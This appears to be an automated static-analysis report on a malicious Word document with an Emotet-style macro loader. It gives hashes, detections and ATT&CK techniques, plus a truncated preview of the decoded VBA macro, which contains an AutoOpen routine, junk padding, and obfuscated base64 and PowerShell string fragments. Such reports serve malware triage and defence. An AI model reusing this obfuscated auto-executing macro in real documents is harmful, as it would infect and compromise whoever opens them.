Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bef2bb0dd1ecb01c…

MALICIOUS

Office (OLE)

156.0 KB Created: 2018-04-13 14:51:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 353cf863b60cc894d22590d2bf7452b4 SHA-1: 2d1766a5bf717e8a3dc7227ad243fdb9fdc328b9 SHA-256: bef2bb0dd1ecb01c2b19b487c2beeb85fa8ec6166ff7c3b7fe17afb9a3b4f849
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1041 Exfiltration Over C2 Channel

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute arbitrary code. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further confirm its malicious nature. The VBA script appears to be obfuscated but likely downloads and executes a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 151199 bytes
SHA-256: 7846e6bb191d7e27945bcc9315a209ad1c096193154f10c5d05c42efbece04dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 60 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wNswGIA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case zItsLo
Case 26173
kcIrs = CStr(24551 * Log(UjrMH) * 87768 - vsYcs)
oGrTnA = 6843
End Select
Application.Run TzlRvk + "jpWcZGz" + kJjqHh, oSGnAo + pwnTqYKXS + BUiwW
Select Case dkpErJ
Case 20562
jGuMJ = CStr(36706 * Log(jolkJ) * 25348 - ZMzzO)
SfDUYI = 27030
End Select
End Sub

Attribute VB_Name = "TfzzWaI"
Sub LbrVC(fwLNO)
Select Case LcEsu
Case 66219
BDZoBF = CStr(19956 * Log(Jmnnm) * 18659 - AYItZ)
zGJLt = 4585
End Select
End Sub
Function pwnTqYKXS()
On Error Resume Next
Select Case UEcXla
Case 57088
IoUDql = CStr(74606 * Log(Nibilk) * 42180 - EijJqw)
ULOWI = 29927
End Select
HOmsfoq = ltdHa("3zDkAMQBiAGYANwBiADYAMgA3ADQAZQBkADgANwAwADQAYQA1AGQAYgBiAGEANwBkAGIAYQA2ADIAZQA3ADAAMgAzADQAYgAxADcAYQBjADUAMQAxADUAYgBiADUAOQBkADIAMgBlAGQAOAA0ADIAOQAxADUAMgBjm4RN,", 3 + uzqUi - uzqUi, 159 + uzqUi - uzqUi)
Select Case foWbYJ
Case 35126
HCtid = CStr(53402 * Log(RvkisT) * 5908 - UoJSzs)
PdijDm = 15771
End Select
Select Case wzDObB
Case 57836
hWDXQA = CStr(16896 * Log(cPzRp) * 53382 - JQXAn)
ZhpVtZ = 1485
End Select
UELfRKWj = ltdHa("jhaL]::SEcuresTRingtOGlobalallOcUnicoDe($('76492d1116743f042341l%wn8", 2 + LMQia - LMQia, 62 + LMQia - LMQia)
Select Case SmCQzS
Case 18329
iITBPt = CStr(88815 * Log(VpVnt) * 96032 - BqCHp)
CWaIh = 19749
End Select
Select Case TWwntV
Case 33928
HNDtOL = CStr(60999 * Log(MfiWU) * 24561 - TllAQE)
PPrWIS = 89606
End Select
fqRuYJPGk = ltdHa("zgA4AGYAYwA2AGEAYwBlADYAMQBmAGUAOQBiADYAMwBlAGMAYgBmAGMANgA3A4OOin", 2 + zBpJBP - zBpJBP, 60 + zBpJBP - zBpJBP)
Select Case DBwowf
Case 45429
piALu = CStr(7237 * Log(WKHsfC) * 15035 - AnVwo)
sCNPV = 52848
End Select
Select Case Pizvsw
Case 21809
AHiWY = CStr(25454 * Log(GzOCu) * 18092 - sJUYv)
SXoVq = 53339
End Select
fQYSVFdjsYC = ltdHa("kTn5AGQAYgBmAGEAOQA0AGEANABiADUAMAA3AGQAZQBmAGUAZAA1ADAAMQA0AGYANQBiADQAMgA5AGIAOAAwADgAZQAwADQAZgA0AGQAYwAyAGQANwAwAGIAMwBhASKzj", 4 + afOzvV - afOzvV, 122 + afOzvV - afOzvV)
Select Case HdBYmG
Case 10763
BzIjWL = CStr(9940 * Log(irbWP) * 73551 - aTApAd)
JjwiJ = 55843
End Select
Select Case MaKnR
Case 77176
LKviO = CStr(73718 * Log(IzRUdp) * 27875 - cuVCOB)
qFlNjI = 20686
End Select
COuac = ltdHa("5MgBhAGMANQBkAGYAMAA0ADUAOQA2ADIANgBjAGEAMQA4ADUAMgAyADYAZQAzADgANwA4AGYAMAAzADMAOQA4AGYAYQAwADMAZQAzAGMAYgBmADQAOABkADYANgBiADIAMwBlADcAMgBmADcAYgAzAGEAMAA5ADIAMQA4ADEA5zbT2HlN", 2 + pQnDUq - pQnDUq, 168 + pQnDUq - pQnDUq)
Select Case jjclH
Case 47151
wtwIE = CStr(7438 * Log(Rvkrh) * 94875 - ROZUh)
pzBCj = 94877
End Select
Select Case HksRRP
Case 89834
lQWwJ = CStr(16840 * Log(sCYUbG) * 4040 - hHfrLb)
HzvoN = 24402
End Select
INkpbb = ltdHa("AN%2AGCj", 5 + inAEHG - inAEHG, 2 + inAEHG - inAEHG)
Select Case QlqwNX
Case 35151
EwBwD = CStr(9469 * Log(SFVFAL) * 19725 - YjuiIZ)
Uukwm = 74765
End Select
Select Case bUqrlC
Case 55516
DkZcI = CStr(98972 * Log(WFEnDv) * 23993 - tbiqb)
clbVF = 55889
End Select
fjcTsGV = ltdHa("27GCAMQAyAGUAYQBhAGQAMgBiADgAMwBjADAAMABhAGEAZAA0AGYAYwAwAGMANABkADgAZQAyAGUAYgA1AGYANgBiADgAZQAzADEAZABiADQAZQA5AGYAOQA2AGMAYwAwWX", 5 + dsiSOC - dsiSOC, 125 + dsiSOC - dsiSOC)
Select Case IatmN
Case 688
zEKqwk = CStr(44244 * Log(AsvwOP) * 93634 - DLBub)
zGCWlO = 60094
End Select
Select Case CHTis
Case 45280
SMGrVR = CStr(54218 * Log(XzZjH) * 95928 - KRSWK)
hwzHpQ = 51272
End Select
JwTmAREwIp = ltdHa("kFwF3ADgAOAAzADUAYwAwADYAMAA3ADYANwAzAGMAMwA1ADMAMwBkAGYAOQA4AGUANgA2AGEAMQA2ADAAYQBkAGYAZAAzAGMAMgAyAGMAZgBhADYAYwBlADUAYgAxADQAYwAzAGUAMgAxADgAYgA3ADkANgA3AGEAMAA4ADUAZABlAGMAMwEV", 5 + ApuaH - ApuaH, 175 + ApuaH - ApuaH)
Select Case wapqLB
Case 60068
jaZtqC = CStr(82680 * Log(dXLkwC) * 30644 - MBkQJ)
fBBfbY = 68827
End Select
Select Case jPtFfV
Case 80341
ZNdaBV = CStr(18084 * Log(ZSLVGT) *
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.